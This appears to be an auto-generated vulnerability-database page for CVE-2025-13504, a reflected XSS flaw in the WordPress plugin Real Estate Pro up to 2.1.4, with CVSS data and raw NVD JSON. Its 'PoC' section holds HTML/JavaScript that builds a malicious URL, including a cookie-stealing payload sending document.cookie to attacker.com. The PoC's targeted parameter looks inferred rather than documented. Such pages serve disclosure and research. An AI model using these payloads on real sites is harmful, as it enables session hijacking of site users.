Security Vulnerability Report
中文
CVE-2025-13504 CVSS 7.1 HIGH

CVE-2025-13504

Published: 2026-01-08 10:15:46
Last Modified: 2026-04-27 17:16:24
Source: [email protected]

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in e-plugins Real Estate Pro real-estate-pro allows Reflected XSS.This issue affects Real Estate Pro: from n/a through <= 2.1.4.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Real Estate Pro <= 2.1.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-13504 PoC - Reflected XSS in Real Estate Pro Plugin --> <!-- Target: WordPress Real Estate Pro Plugin <= 2.1.4 --> <!-- Attack Vector: Malicious URL with JavaScript payload --> <!DOCTYPE html> <html> <head> <title>CVE-2025-13504 PoC</title> </head> <body> <h2>CVE-2025-13504 - Real Estate Pro Reflected XSS PoC</h2> <!-- Malicious URL - Replace YOUR_TARGET with actual domain --> <p>Malicious URL:</p> <code id="maliciousUrl"></code> <script> // Construct the malicious URL // The XSS payload is injected through URL parameters that are reflected without sanitization const targetBase = 'http://YOUR_TARGET/wp-admin/admin.php'; const xssPayload = '<script>alert("XSS - CVE-2025-13504")</script>'; const maliciousUrl = targetBase + '?page=real_estate_pro&search=' + encodeURIComponent(xssPayload); document.getElementById('maliciousUrl').textContent = maliciousUrl; // Alternative payload for cookie stealing const cookieStealPayload = '<img src=x onerror="fetch(\'https://attacker.com/steal?cookie=\'+document.cookie)">' const cookieStealUrl = targetBase + '?page=real_estate_pro&search=' + encodeURIComponent(cookieStealPayload); console.log('Cookie stealing URL:', cookieStealUrl); </script> <!-- Attack Steps: 1. Attacker crafts a URL with XSS payload in search parameter 2. Victim is tricked into clicking the malicious link 3. Server reflects the unsanitized input in response 4. Victim's browser executes the malicious JavaScript 5. Attacker steals session cookies or performs other malicious actions --> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13504", "sourceIdentifier": "[email protected]", "published": "2026-01-08T10:15:45.517", "lastModified": "2026-04-27T17:16:24.233", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in e-plugins Real Estate Pro real-estate-pro allows Reflected XSS.This issue affects Real Estate Pro: from n/a through <= 2.1.4."}, {"lang": "es", "value": "Neutralización incorrecta de la entrada durante la generación de páginas web ('cross-site scripting') vulnerabilidad en e-plugins Real Estate Pro real-estate-pro permite XSS Reflejado. Este problema afecta a Real Estate Pro: desde n/a hasta &lt;= 2.1.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/real-estate-pro/vulnerability/wordpress-real-estate-pro-plugin-2-1-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.